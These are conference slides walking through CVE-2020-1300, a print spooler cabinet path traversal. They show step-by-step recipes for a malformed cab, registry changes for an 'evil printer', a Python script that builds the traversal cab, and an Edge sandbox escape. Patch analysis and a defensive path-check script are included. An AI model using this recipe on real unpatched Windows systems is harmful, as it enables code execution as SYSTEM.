Evil Printer 


How to Hack Windows Machines with Printing Protocol 


Who are We? 


• Zhipeng Huo (@R3dF09)
  • Senior security researcher
  • Member of EcoSec Team at Tencent Security Xuanwu Lab
  • Windows and macOS platform security
  • Speaker at Black Hat Europe 2018

• Chuanda Ding (@FlowerCode)
  • Senior security researcher
  • Leads EcoSec Team at Tencent Security Xuanwu Lab
  • Windows platform security
  • Speaker at Black Hat Europe 2018, DEF CON China 2018, CanSecWest 2017/2016
Agenda

• Printing internals
• Attack surfaces
• CVE-2020-1300
• Exploitation walk-through
• Patch
• Conclusion


Evil Printer?

How Does Network Printing Work?

Rendering in Network Printing

[Figure: the two rendering models, Client-side Rendering and Server-side Rendering]

What is a Printer Driver?


Interface component between the OS and the printer

• Rendering component
  • Converts application data into printer-specific data
• Configuration component
  • Enables the user to configure the printer

"In order to support both client-side and server-side rendering, it is a requirement that printer drivers are available to print server and print client."

Supporting Client-Side Rendering and Server-Side Rendering
https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-prsod/e47fedcc-d422-42a6-89fc-f04eb0c168e3


How Are Printer Drivers Distributed?

Point-and-Print
• Allows a print client to download the printer driver directly from a print server

Package Point-and-Print
• Allows a print client to download a printer support package that includes the print driver

"The package approach to driver installation provides improved security for point and print by checking driver signing during the establishment of a point and print connection."

Point and Print with Packages
https://docs.microsoft.com/en-us/windows-hardware/drivers/print/point-and-print-with-packages


Print Spooler Service

• Primary component of Windows printing
• Auto-start service, always running
• Manages the printing process
• Exports the printing APIs
• Implements both the print client and the print server roles
• Manages printer drivers
  • Retrieves the correct printer driver
  • Loads the driver
• Dangerous design
  • Runs at SYSTEM privilege level
  • Does networking
  • Dynamically loads third-party binaries

[Figure: spooler architecture diagram; only the "Application" box label survived extraction]

Printing API

[Figure: printing API layering diagram]


Why Target Windows Printing?

• Much older than the average Windows legacy component
  • More than 25 years (!)
• One of the most important services
  • Highly integrated with the OS
• Very complex and confusing
• Highest privilege level

Local Attack Surfaces

• Windows printing has many services and components that work at the highest privilege level
• They expose interfaces to lower privilege levels, even to AppContainer
• Abusing them can result in local privilege escalation or sandbox escape

Remote Attack Surfaces

• Attack the print server
  • Exposes the system to an untrusted network
• Attack the print client
  • May be attacked by a malicious print server (Evil Printer)

What Happens Behind the Scenes when Windows Connects to a Printer?

Print Client Connects to Print Server

PowerShell
• Add-Printer -ConnectionName \\printServer\printerName

Win32 Print Spooler API
• AddPrinterConnection
• AddPrinterConnection2

Add Printer UI
• printui /im

[Screenshot: the "Add Printer" wizard, "Find a printer by other options":
  ( ) My printer is a little older. Help me find it.
  (•) Select a shared printer by name
      Example: \\computername\printername or http://computername/printers/printername/.printer
  ( ) Add a printer using a TCP/IP address or hostname
  ( ) Add a Bluetooth, wireless or network discoverable printer
  ( ) Add a local printer or network printer with manual settings]

All Roads Lead to winspool!AddPrinterConnection2

    BOOL AddPrinterConnection2(
      _In_ HWND    hWnd,
      _In_ LPCTSTR pszName,
      _In_ DWORD   dwLevel,
      _In_ PVOID   pConnectionInfo
    );

pszName [in]
A pointer to a null-terminated string that specifies the name of a printer to which the current user wishes to establish a connection.


Warning Dialog after AddPrinterConnection2

[Dialog: "Windows needs to download and install a software driver from the \\192.168.234.133 computer to print to test. Proceed only if you trust the \\192.168.234.133 computer and the network."
  [ ] Don't show this again                              [Install driver]]

Purpose of the Warning Dialog

• What if the printer driver is malicious?
• CVE-2016-3238
  • Windows Print Spooler Remote Code Execution
  • "A remote code execution vulnerability exists when the Windows Print Spooler service does not properly validate print drivers while installing a printer from servers."
  • "The update addresses the vulnerability by issuing a warning to users who attempt to install untrusted printer drivers."


AddPrinterConnection2 Internals

• ERROR_PRINTER_DRIVER_DOWNLOAD_NEEDED
  • 0x00000BB9 (3001)
• winspool!DownloadAndInstallLegacyDriver
  • ntprint!PSetupDownloadAndInstallLegacyDriver
    • ntprint!DisplayWarningForDownloadDriver
    • ntprint!DownloadAndInstallLegacyDriver

Point-and-Print or Package Point-and-Print?

[Screenshot: Add Printer wizard, "You've successfully added CutePDF Writer on 192.168.234.135"; Printer name: CutePDF Writer on 192.168.234.135; "This printer has been installed with the CutePDF Writer v4.0 driver." Printers & scanners then lists "CutePDF Writer on 192.168.234.135" (Open queue / Manage / Remove device).]


Capture the Driver Download

[Process Monitor capture, spoolsv.exe (PID 2116):
  ReadFile / WriteFile / CreateFile on \\192.168.234.133\pipe\spoolss
  CreateFile / WriteFile into C:\Users\R3DF09\AppData\Local\Temp\{2D28DDBA-C515-4FAB-ABC8-E5CE2A393E80}\ for
    PSCRIPT5.DLL, PS5UI.DLL, CUTEPDFW.PPD, PSCRIPT.HLP, PSCRIPT.NTF
  followed by reads and image loads of the downloaded PSCRIPT5.DLL and PS5UI.DLL from that temp directory
  (PATH NOT FOUND for the en-US\ and en\ .mui resource lookups next to them)]


Capture the Driver Install

[Process Monitor capture, spoolsv.exe (PID 2116), 3:24:5x:
  ReadFile C:\Users\R3DF09\AppData\Local\Temp\{2D28DDBA-C515-4FAB-ABC8-E5CE2A393E80}\CUTEPDFW.PPD in 4,096-byte chunks
    (offsets 0 ... 28,672; last chunk 3,064 bytes; END OF FILE at offset 31,736)
  WriteFile of the same chunks to C:\Windows\System32\spool\drivers\x64\3\New\CUTEPDFW.PPD
  SetBasicInformationFile (Creation Time 7/15/2020 8:52:53 PM) and QueryAttributeTagFile on the New\ copy
  SetRenameInformationFile: C:\Windows\System32\spool\drivers\x64\3\New\CUTEPDFW.PPD -> C:\Windows\System32\spool\drivers\x64\3\CUTEPDFW.PPD (ReplaceIfExists: True)
  QueryDirectory for PSCRIPT.HLP and PSCRIPT.NTF in both the temp directory and C:\Windows\System32\spool\drivers\x64\3]


It's Point-and-Print!

How to Enable the Package Point-and-Print Mechanism?

spoolsv!RpcAddPrinterConnection2
  win32spl!TPrintOpen::CreateLocalPrinter
    win32spl!TPrintOpen::AcquireV3DriverAndAddPrinter
      win32spl!TDriverInstall::DeterminateInstallType
        win32spl!TDriverInstall::CheckPackagePointAndPrint

win32spl!TDriverInstall::CheckPackagePointAndPrint (decompiled)

    if ( v5 >= 0 )
    {
        /* v14 = the DRIVER_INFO_8W obtained from the print server (assignment line garbled in the capture) */
        if ( *(BYTE *)(v14 + 0xA8) & 1 )    // dwPrinterDriverAttributes & PRINTER_DRIVER_PACKAGE_AWARE
        {
            v5 = TDriverInstall::DownloadAndImportDriverPackages(v2, (struct _DRIVER_INFO_8W *)v14);
        }
    }

The decision is driven entirely by a structure the server sends: offset 0xA8 of DRIVER_INFO_8W, bit 0.


Get Object

[Figure: Print Client --RPC Get Object--> Print Server]

DRIVER_INFO_8W Structure


    +0x000 cVersion                    Uint4B
    +0x008 pName                       Ptr64 Wchar
    +0x010 pEnvironment                Ptr64 Wchar
    +0x018 pDriverPath                 Ptr64 Wchar
    +0x020 pDataFile                   Ptr64 Wchar
    +0x028 pConfigFile                 Ptr64 Wchar
    +0x030 pHelpFile                   Ptr64 Wchar
    +0x038 pDependentFiles             Ptr64 Wchar
    +0x040 pMonitorName                Ptr64 Wchar
    +0x048 pDefaultDataType            Ptr64 Wchar
    +0x050 pszzPreviousNames           Ptr64 Wchar
    +0x058 ftDriverDate                FILETIME
    +0x060 dwlDriverVersion            Uint8B
    +0x068 pszMfgName                  Ptr64 Wchar
    +0x070 pszOEMUrl                   Ptr64 Wchar
    +0x078 pszHardwareID               Ptr64 Wchar
    +0x080 pszProvider                 Ptr64 Wchar
    +0x088 pszPrintProcessor           Ptr64 Wchar
    +0x090 pszVendorSetup              Ptr64 Wchar
    +0x098 pszzColorProfiles           Ptr64 Wchar
    +0x0a0 pszInfPath                  Ptr64 Wchar
    +0x0a8 dwPrinterDriverAttributes   Uint4B
    +0x0b0 pszzCoreDriverDependencies  Ptr64 Wchar
    +0x0b8 ftMinInboxDriverVerDate     FILETIME
    +0x0c0 dwlMinInboxDriverVerVersion Uint8B


PrinterDriverAttributes

    #define PRINTER_DRIVER_PACKAGE_AWARE        0x00000001
    #define PRINTER_DRIVER_XPS                  0x00000002
    #define PRINTER_DRIVER_SANDBOX_ENABLED      0x00000004
    #define PRINTER_DRIVER_CLASS                0x00000008
    #define PRINTER_DRIVER_DERIVED              0x00000010
    #define PRINTER_DRIVER_NOT_SHAREABLE        0x00000020
    #define PRINTER_DRIVER_CATEGORY_FAX         0x00000040
    #define PRINTER_DRIVER_CATEGORY_FILE        0x00000080
    #define PRINTER_DRIVER_CATEGORY_VIRTUAL     0x00000100
    #define PRINTER_DRIVER_CATEGORY_SERVICE     0x00000200
    #define PRINTER_DRIVER_SOFT_RESET_REQUIRED  0x00000400
    #define PRINTER_DRIVER_SANDBOX_DISABLED     0x00000800
    #define PRINTER_DRIVER_CATEGORY_3D          0x00001000
    #define PRINTER_DRIVER_CATEGORY_CLOUD       0x00002000


Driver Package

• A collection of the files needed to successfully load a driver
  • Device information file (.inf)
  • Catalog file (.cat)
  • All the files copied by the .inf file

[Screenshot: the package cabinet prnms001.inf_amd64_8ed8ca94fd954adb.cab containing MXDW.gpd, MXDW-pipelineconfig.xml, prnms001.cat, prnms001.inf and prnms001.PNF]

Where to Get the PCC (Package Cabinet)

C:\Windows\System32\spool\drivers\x64\PCC

    Name                                      Date modified        Type          Size
    ntprint.inf_amd64_07e03d34435d8940.cab    7/16/2020 11:35 AM   Cabinet File  3,829 KB
    prnms001.inf_amd64_8ed8ca94fd954adb.cab   7/16/2020 11:35 AM   Cabinet File     11 KB
    prnms002.inf_amd64_7195f31f5acda8f4.cab   7/16/2020 11:35 AM   Cabinet File  2,310 KB
    prnms003.inf_amd64_85c8869cca48951c.cab   7/16/2020 11:35 AM   Cabinet File  1,302 KB
    prnms009.inf_amd64_0ab2e212e0139e8c.cab   7/16/2020 11:35 AM   Cabinet File     11 KB

InfPath:
C:\Windows\System32\DriverStore\FileRepository\prnms003.inf_amd64_85c8869cca48951c\prnms003.inf

PackagePath:
C:\Windows\System32\spool\drivers\x64\PCC\prnms003.inf_amd64_85c8869cca48951c.cab


DownloadAndImportDriverPackages

• TDriverInstall::DownloadAndImportDriverPackages
  • TDriverInstall::DownloadAndExtractDriverPackageCab
    • TDriverInstall::InternalCopyFile
    • NCabbingLibrary::LegacyCabUnpack

Cabinet File

• Archive-file format for Microsoft Windows
• A file that has the suffix .cab and that acts as a container for other files
• It serves as a compressed archive for a group of files

File Decompression Interface (FDI) APIs

• Cabinet!FDICreate
  • Creates an FDI context
• Cabinet!FDICopy
  • Extracts files from a cabinet
• Cabinet!FDIDestroy
  • Deletes an open FDI context


FDICopy

    BOOL DIAMONDAPI FDICopy(
      HFDI          hfdi,
      LPSTR         pszCabinet,
      LPSTR         pszCabPath,
      int           flags,
      PFNFDINOTIFY  pfnfdin,
      PFNFDIDECRYPT pfnfdid,
      void          *pvUser
    );

pfnfdin
Pointer to an application-defined callback notification function to update the application on the status of the decoder. The function should be declared using the FNFDINOTIFY macro.

win32spl!NCabbingLibrary::LegacyCabUnpack (decompiled)

    FDICopy(v12,
            pszCabinet,
            pszCabPath,
            0,
            (PFNFDINOTIFY)NCabbingLibrary::FdiCabNotify,
            0i64,
            &pvUser);

NCabbingLibrary::FdiCabNotify

• fdintCOPY_FILE: information identifying the file to be copied (the file name is the one stored in the cabinet's CFFILE entry)

    if ( ... )                                          // guard condition garbled in the capture
    {
        v17 = *(_QWORD *)v3;
        v21 = -1i64;
        v15 = NCabbingLibrary::ProcessCopyFile(
                (NCabbingLibrary *)Block,
                *(const unsigned __int16 **)(v14 + 8),  // the entry name from the cabinet
                (const unsigned __int16 *)&v21,
                v16);
        operator delete(Block);
        v4 = v21;
    }


NCabbingLibrary::ProcessCopyFile

• NCabbingLibrary::CreateFullPath
  • Walks the entry name with wcschr(v10, '\\') and creates each directory component
  • Checks for "..\\"
  • But forgot "../" ?
• _wopen
  • _O_BINARY | _O_CREAT | _O_TRUNC | _O_RDWR (0x8302)

    v14 = *v11 - asc_1800B3FF0[0];        // compare the component against the constant string at asc_1800B3FF0
    if ( !v14 )
        ...
    v8 = NCabbingLibrary::CreateFullPath((NCabbingLibrary *)FileName, (const unsigned __int16 *)v9);
    if ( v8 >= 0 )
    {
        ...
        if ( !CreateDirectoryW(v8, 0i64) && GetLastError() ... )
        ...
        *(_QWORD *)a3 = (NCoreLibrary::TString *)_wopen(v10, 0x8302, 0x180i64);   // 0x180 = _S_IREAD | _S_IWRITE
    }

The directory walk and the traversal check both key on the backslash. A cabinet entry named with forward slashes is never split into components, so "../" passes straight through to _wopen, which runs in spoolsv.exe as SYSTEM.


Make a Malformed Cab

• makecab 112112DiagSvcs2USERENV.dll test.cab

[Screenshot: 7-Zip opens C:\test\test.cab and lists one entry, 112112DiagSvcs2USERENV.dll (MSZip, 2017-03-02 15:11:08)]

HexEdit the cab file

[Hex dump of test.cab: the MSCF header, then the CFFILE name, where the placeholder bytes "112112" and "2" have been overwritten with "../../" and "/" so the entry reads ../../DiagSvcs/USERENV.dll]

Malformed Cabinet

[Screenshot: 7-Zip now shows the entry under C:\test\test.cab\..\..\DiagSvcs\ as USERENV.dll, 91648 bytes, 2017-03-02 15:11, attributes A]
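The talk builds the malformed cabinet with makecab and a hex editor. As an added example (not the speakers' tooling and not part of the slides), the following Python script produces the same kind of cabinet directly: it writes a minimal MSCF container whose single CFFILE name is "../../DiagSvcs/USERENV.dll", computes the CFDATA checksum the way FDI verifies it, and parses the result back to show that the name is stored verbatim. The payload bytes are a constructed stand-in for USERENV.dll; the function names, constants and the stored (tcompTYPE_NONE) folder are this example's own choices.

```python
import struct

# Layout constants from the MS-CAB specification (little-endian throughout).
CFHEADER_FMT = "<4sIIIIIBBHHHHH"  # signature, reserved1, cbCabinet, reserved2, coffFiles, reserved3,
                                  # versionMinor, versionMajor, cFolders, cFiles, flags, setID, iCabinet
CFFOLDER_FMT = "<IHH"             # coffCabStart, cCFData, typeCompress
CFFILE_FMT = "<IIHHHH"            # cbFile, uoffFolderStart, iFolder, date, time, attribs, then NUL-terminated szName
CFDATA_FMT = "<IHH"               # csum, cbData, cbUncomp, then ab[cbData]
TCOMP_NONE = 0                    # stored, no compression: keeps the example free of MSZIP/LZX code
ATTR_ARCHIVE = 0x20


def cab_checksum(data: bytes, seed: int = 0) -> int:
    """CSUMCompute() from the specification: XOR of little-endian dwords; the 1..3 trailing bytes
    are folded in with the first of them in the most significant position."""
    csum = seed
    full = len(data) // 4
    for i in range(full):
        csum ^= struct.unpack_from("<I", data, 4 * i)[0]
    tail = 0
    for b in data[4 * full:]:
        tail = (tail << 8) | b
    return (csum ^ tail) & 0xFFFFFFFF


def build_cab(entry_name: str, payload: bytes) -> bytes:
    """Single-folder, single-file cabinet.  entry_name is written verbatim into CFFILE.szName, so a
    traversal sequence survives exactly as given: that is the malformed part."""
    if len(payload) > 0x8000:
        raise ValueError("one CFDATA block only; cbData is limited to 0x8000")
    szname = entry_name.encode("ascii") + b"\x00"
    coff_files = struct.calcsize(CFHEADER_FMT) + struct.calcsize(CFFOLDER_FMT)
    coff_cabstart = coff_files + struct.calcsize(CFFILE_FMT) + len(szname)
    sizes = struct.pack("<HH", len(payload), len(payload))          # cbData, cbUncomp
    csum = cab_checksum(payload, cab_checksum(sizes))               # csum covers cbData .. ab[cbData-1]
    cfdata = struct.pack(CFDATA_FMT, csum, len(payload), len(payload)) + payload
    cfheader = struct.pack(CFHEADER_FMT, b"MSCF", 0, coff_cabstart + len(cfdata), 0, coff_files, 0,
                           3, 1, 1, 1, 0, 0, 0)                     # version 1.3, 1 folder, 1 file, no flags
    cffolder = struct.pack(CFFOLDER_FMT, coff_cabstart, 1, TCOMP_NONE)
    dos_date = ((2017 - 1980) << 9) | (3 << 5) | 2                  # 2017-03-02, as in the talk's 7-Zip view
    dos_time = (15 << 11) | (11 << 5) | (8 // 2)                    # 15:11:08
    cffile = struct.pack(CFFILE_FMT, len(payload), 0, 0, dos_date, dos_time, ATTR_ARCHIVE) + szname
    return cfheader + cffolder + cffile + cfdata


def list_cab(blob: bytes) -> list:
    """Parse a plain (no reserve fields) tcompTYPE_NONE cabinet back into [(name, content)],
    verifying every CFDATA checksum, as FDI does before it raises fdintCOPY_FILE."""
    hdr = struct.unpack_from(CFHEADER_FMT, blob, 0)
    sig, coff_files, vmin, vmaj, cfolders, cfiles, flags = hdr[0], hdr[4], hdr[6], hdr[7], hdr[8], hdr[9], hdr[10]
    if sig != b"MSCF" or (vmaj, vmin) != (1, 3) or flags != 0:
        raise ValueError("not a plain MSCF v1.3 cabinet")
    off = struct.calcsize(CFHEADER_FMT)
    folders = []
    for _ in range(cfolders):
        folders.append(struct.unpack_from(CFFOLDER_FMT, blob, off))
        off += struct.calcsize(CFFOLDER_FMT)
    files, off = [], coff_files
    for _ in range(cfiles):
        cb_file, uoff, ifolder = struct.unpack_from(CFFILE_FMT, blob, off)[:3]
        off += struct.calcsize(CFFILE_FMT)
        end = blob.index(b"\x00", off)
        files.append((blob[off:end].decode("ascii"), cb_file, uoff, ifolder))
        off = end + 1
    folder_data = []
    for coff_cabstart, ccfdata, typecomp in folders:
        if typecomp != TCOMP_NONE:
            raise ValueError("only tcompTYPE_NONE folders are handled here")
        buf, off = bytearray(), coff_cabstart
        for _ in range(ccfdata):
            csum, cb_data, cb_uncomp = struct.unpack_from(CFDATA_FMT, blob, off)
            off += struct.calcsize(CFDATA_FMT)
            chunk = blob[off:off + cb_data]
            if csum != cab_checksum(chunk, cab_checksum(struct.pack("<HH", cb_data, cb_uncomp))):
                raise ValueError("CFDATA checksum mismatch")
            buf += chunk
            off += cb_data
        folder_data.append(bytes(buf))
    return [(name, folder_data[ifolder][uoff:uoff + cb]) for name, cb, uoff, ifolder in files]


if __name__ == "__main__":
    # Constructed stand-in for USERENV.dll; the name is the one the talk hex-edits into test.cab.
    evil = build_cab("../../DiagSvcs/USERENV.dll", b"MZ" + b"\x90" * 62)
    for name, content in list_cab(evil):
        print(f"{name}: {len(content)} bytes")
    with open("test.cab", "wb") as f:
        f.write(evil)
```

Nothing in the container format forbids the name: the checksum only covers the data block, and the CFFILE name is an arbitrary NUL-terminated string. Whether "../" ever reaches the filesystem is entirely up to the fdintCOPY_FILE callback of the extracting application, which is exactly where win32spl got it wrong.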


Prepare the Print Server

• Install a virtual printer
  • CutePDF Writer
• Share the printer

[Screenshot: Printers & scanners listing CutePDF Writer (Open queue / Manage / Remove device), Microsoft Print to PDF and Microsoft XPS Document Writer]

SHA1 of CuteWriter: fdf1f3f2a483d62b15c6bf84095fe3ae2ef8e4c38

Default PrinterDriverAttributes of CutePDF Writer

Computer\HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Print\Environments\Windows x64\Drivers\Version-3\CutePDF Writer v4.0

    Name                       Type           Data
    (Default)                  REG_SZ         (value not set)
    App Registration           REG_MULTI_SZ
    Attributes                 REG_DWORD      0x00000002 (2)
    Base Driver                REG_SZ
    ColorProfiles              REG_MULTI_SZ
    Configuration File         REG_SZ         PS5UI.DLL
    CoreDependencies           REG_MULTI_SZ
    Data File                  REG_SZ         CUTEPDFW.PPD
    Datatype                   REG_SZ         RAW
    Dependent Files            REG_MULTI_SZ   PSCRIPT.NTF
    Driver                     REG_SZ         PSCRIPT5.DLL
    DriverDate                 REG_SZ         01/01/1601
    DriverVersion              REG_SZ         0.0.0.0
    HardwareID                 REG_SZ
    Help File                  REG_SZ         PSCRIPT.HLP
    InfPath                    REG_SZ
    LastServicedBuild          REG_DWORD      0x00004cb8 (19640)
    Manufacturer               REG_SZ
    MinInboxDriverVerDate      REG_SZ         01/01/1601
    MinInboxDriverVerVersion   REG_SZ         0.0.0.0
    Monitor                    REG_SZ
    OEM URL                    REG_SZ
    Previous Names             REG_MULTI_SZ
    Print Processor            REG_SZ
    PrinterDriverAttributes    REG_DWORD      0x00000000 (0)
    PrinterDriverID            REG_SZ
    Provider                   REG_SZ
    TempDir                    REG_DWORD      0x00000000 (0)
    VendorSetup                REG_SZ
    Version                    REG_DWORD      0x00000003 (3)


Make an Evil Printer

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Print\Environments\Windows x64\Drivers\Version-3\CutePDF Writer v4.0

• PrinterDriverAttributes = 1   (PRINTER_DRIVER_PACKAGE_AWARE, so the client takes the package path)
• InfPath = "c:\test\test.inf"

• Create a file C:\test\test.inf
• Put test.cab at C:\Windows\System32\spool\drivers\x64\PCC

[Screenshot: C:\Windows\System32\spool\drivers\x64\PCC now lists the five inbox package cabinets (7/16/2020 11:35 AM) plus test.cab (7/22/2020 2:23 PM)]


Print Client Connects to the Evil Printer

[Process Monitor capture, spoolsv.exe (PID 3712) on the client:
  CreateFile / ReadFile of the cabinet from the server's print$ share through the Offline Files (CSC) namespace:
    C:\Windows\CSC\v2.0.6\namespace\192.168.234.135\print$\x64\PCC\test.cab
  CreateFile / WriteFile of a local copy C:\Windows\System32\spool\{7A047B18-DFC7-45EB-9A6B-E60831D0E8B5}.cab
    (next to an extraction directory C:\Windows\System32\spool\{7A047B18-DFC7-45EB-9A6B-E60831D0E8B5})
  then CreateFile, WriteFile and SetBasicInformationFile on C:\Windows\System32\DiagSvcs\USERENV.dll:
    the "../../DiagSvcs/USERENV.dll" entry escaped the extraction directory and was written by SYSTEM]


What Else Can It Do?

"COM in 60 seconds", James Forshaw
"Edge is Watching You PWN"
https://www.youtube.com/watch?v=dfMuzAZRGm4

[Screenshot: OleViewDotNet (64-bit), Registry > AppIDs from LPAC / AppIDs from AC, listing among others CoreDpusSvr, DataExchangeHost, editionupgradebroker, Local Service Credential UI Broker, OOBE Bio Enrollment, PaymentsSvc; Edge + AC: 40 CLSIDs, Edge + LPAC: 20 CLSIDs]


Microsoft Edge

• The Microsoft Edge renderer process is the most restricted AppContainer sandbox
• Capability: lpacPrinting

[Figure: Edge renderer process: AppContainer with a LowBox token, AppContainer SID and capability SIDs (internetClient, microphone, lpacPrinting), Low Integrity, Windows Runtime and Win32 subsystem; the CPrintTicket COM service sits outside the AppContainer]

[Screenshot: OleView .NET v1.11 (64-bit), CLSID 2A81FE91-95D7-487E-BBF8-B03308E54207, Launch security:
  Owner: BUILTIN\Administrators, Group: BUILTIN\Administrators, Integrity: Low (NoExecuteUp)
  DACL: Allowed  NAMED CAPABILITIES\Lpac Printing  GenericAll
  Specific access: Execute 0x00000001, Execute Local 0x00000002, Execute Remote 0x00000004, Activate Local 0x00000008, Activate Remote 0x00000010]

The launch permission grants GenericAll to the Lpac Printing capability, so the LPAC renderer may activate this out-of-process server.

Sandbox Escape

    IPrintTicketServicePtr print_ticket;      // smart-pointer typedef for the IPrintTicketService interface
    CoCreateInstance(CLSID_PrintTicket,
                     NULL,
                     CLSCTX_LOCAL_SERVER,
                     IID_PPV_ARGS(&print_ticket));

CPrintTicketServerBase::Bind -> GetPrinterDriver

[Figure: AppContainer (Edge renderer) -> DllHost (CPrintTicket) -> Spooler; DllHost and the spooler both issue CreateFile against the Windows OS, and the spooler does so as SYSTEM]

Binding a print ticket from the sandbox makes the COM server ask the spooler for the printer driver, which triggers the same Point-and-Print driver download and cabinet extraction path described above.

Sandbox Escape Demo


Patch

win32spl!NCabbingLibrary::FdiCabNotify (patched, decompiled)

    if ( !wcsstr(Str, L"../") && !wcsstr(Str, L"..\\") )
    {
        ...                                   // line garbled in the capture
        v22 = -1i64;
        v15 = NCabbingLibrary::ProcessCopyFile(
                (NCabbingLibrary *)Str,
                *(const unsigned __int16 **)(v14 + 8),
                (const unsigned __int16 *)&v22,
                v13);
        operator delete(Str);
        v4 = v22;
        v3[2] = v15;
    }
    return v4;

The fix rejects the entry name (Str) in the fdintCOPY_FILE callback itself, before ProcessCopyFile is reached, and now looks for both "../" and "..\\".
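To make the logic bug and its fix concrete, here is an added example (not code from the talk or from win32spl) that models the entry-name check in three forms and runs it over constructed cabinet entry names: the pre-patch behaviour as the talk describes it (only "..\\" is caught), the patched wcsstr check, and the canonical-path check that a defensive implementation should prefer. The extraction directory is the spool\{GUID} path from the talk's ProcMon capture; the function names and the sample entries are this example's own.

```python
import posixpath

# Extraction directory seen in the talk's Process Monitor capture (forward slashes for posixpath).
EXTRACT_DIR = "C:/Windows/System32/spool/{7A047B18-DFC7-45EB-9A6B-E60831D0E8B5}"


def legacy_name_is_ok(name: str) -> bool:
    """Pre-patch behaviour as the talk describes it: CreateFullPath looks for "..\\" but not "../"."""
    return "..\\" not in name


def patched_name_is_ok(name: str) -> bool:
    """The CVE-2020-1300 fix in FdiCabNotify: !wcsstr(Str, L"../") && !wcsstr(Str, L"..\\")."""
    return "../" not in name and "..\\" not in name


def resolve_target(name: str, root: str = EXTRACT_DIR) -> str:
    """Path the spooler would end up opening: both separators accepted, '.' and '..' collapsed."""
    return posixpath.normpath(posixpath.join(root, name.replace("\\", "/")))


def resolves_inside(name: str, root: str = EXTRACT_DIR) -> bool:
    """Allow-list form of the check: the resolved path must stay strictly under root.
    Absolute and drive-qualified names are rejected outright."""
    norm = name.replace("\\", "/")
    if norm.startswith("/") or (len(norm) > 1 and norm[1] == ":"):
        return False
    return resolve_target(norm, root).startswith(root.rstrip("/") + "/")


def check_entries(names):
    """Run all three checks; True means the entry would be written to disk."""
    return {n: (legacy_name_is_ok(n), patched_name_is_ok(n), resolves_inside(n)) for n in names}


# Constructed entry names; the first one is the talk's payload.
SAMPLE_ENTRIES = [
    "../../DiagSvcs/USERENV.dll",
    "..\\..\\DiagSvcs\\USERENV.dll",
    "prnms003.inf",
    "amd64/prnms003.cat",
    "amd64/../prnms003.cat",
]

if __name__ == "__main__":
    for name, (legacy, patched, canonical) in check_entries(SAMPLE_ENTRIES).items():
        print(f"{name:32} legacy={legacy!s:5} patched={patched!s:5} canonical={canonical!s:5} "
              f"-> {resolve_target(name)}")
```

The first entry passes the legacy check and resolves to C:/Windows/System32/DiagSvcs/USERENV.dll, the very path the capture shows being written. The substring denylist of the patch stops it, but also rejects the harmless "amd64/../prnms003.cat", which the canonical check accepts; more importantly, only the canonical form keeps working for separator or normalisation variants that a denylist did not anticipate, which is why callbacks that receive file names from an archive should resolve the final path and compare it against the destination rather than search for known bad substrings.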


Possible Attack Scenarios

• Lateral movement
  • Modify a trusted printer
• Remote code execution
  • Connect to an attacker-controlled printer
• Privilege escalation
  • Make a printer connection attempt
• NT AUTHORITY\SYSTEM in all scenarios


CVE-2020-1300

CVE-2020-1300 | Windows Remote Code Execution Vulnerability
Security Vulnerability
Published: 06/09/2020
MITRE CVE-2020-1300

"A remote code execution vulnerability exists when Microsoft Windows fails to properly handle cabinet files.

To exploit the vulnerability, an attacker would have to convince a user to either open a specially crafted cabinet file or spoof a network printer and trick a user into installing a malicious cabinet file disguised as a printer driver.

The update addresses the vulnerability by correcting how Windows handles cabinet files."


Don't Panic

[Screenshot: Explorer with "Compressed Folder Tools > Extract" open on C:\test, 1 item selected, 104 KB]

cabview!CCabItemList::AddItem (decompiled)

    do
    {
        if ( v10 >= v6 )
            break;
        v11 = v7[v10] - 47;               // '/' == 47
        if ( v11 <= 45u )                 // character in the range '/' .. '\\'
        {
            v12 = v11;
            v13 = 0x200000000801i64;      // bits 0, 11 and 45: '/', ':' and '\\'
            if ( _bittest64(&v13, v12) )
                v21 = v9 + 1;             // remember the position after the last separator
        }
        v10 = ++v9;
    }
    while ( v7[v9] );

Explorer's cabinet viewer treats '/', ':' and '\\' alike as separators when it builds item names, so opening the malformed cab from Explorer is not fooled by the forward slash the way win32spl was.


Conclusion

• The Windows printing implementation is complex
• Walk-through of CVE-2020-1300
  • Can be exploited both locally and remotely
  • Executes arbitrary code
  • Sandbox escape
  • NT AUTHORITY\SYSTEM
• For developers: handle the cabinet API callbacks carefully
• Logic bugs are always fun!